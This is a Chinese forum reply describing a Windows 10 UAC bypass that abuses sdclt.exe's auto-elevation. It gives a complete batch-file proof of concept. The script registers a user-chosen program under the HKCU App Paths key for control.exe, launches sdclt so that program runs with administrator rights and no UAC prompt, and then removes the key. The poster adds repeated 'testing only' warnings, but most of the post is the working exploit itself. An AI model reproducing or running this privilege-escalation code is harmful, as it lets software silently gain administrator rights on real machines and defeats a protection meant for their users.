看来老夫要来水一发了。
对于这个东西,我们可以得到管理员,甚至可以绕过管理员
在FreeBuf上,有个sdclt.exe可以被利用
“在 Windows 10 开始,sdclt 加入了自动提升权限的能力,requestedExecutionLevel 由 asInvoker 变为 requireAdministrator”
输入sdclt后,直接打开控制面板,而且无需UAC赋予权限,那... ...
![[滑稽]](/static/emoticons/u6ed1u7a3d.png)
我们来段PoC
----------------------------
@echo off
title I Wanna Adminstrator!
echo By WHOAMI
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 请勿随意使用!!!!!!!!!!!!!!!!!!!!
echo 仅供测试学习!!!!!!!!!!!!!!!!!!!!
set /P run=Hey,Guy,要让哪一个程序UAC运行呢?
::Payload
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %run% /f
sdclt
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
----------------------------
仅供测试!希望能够帮到楼主!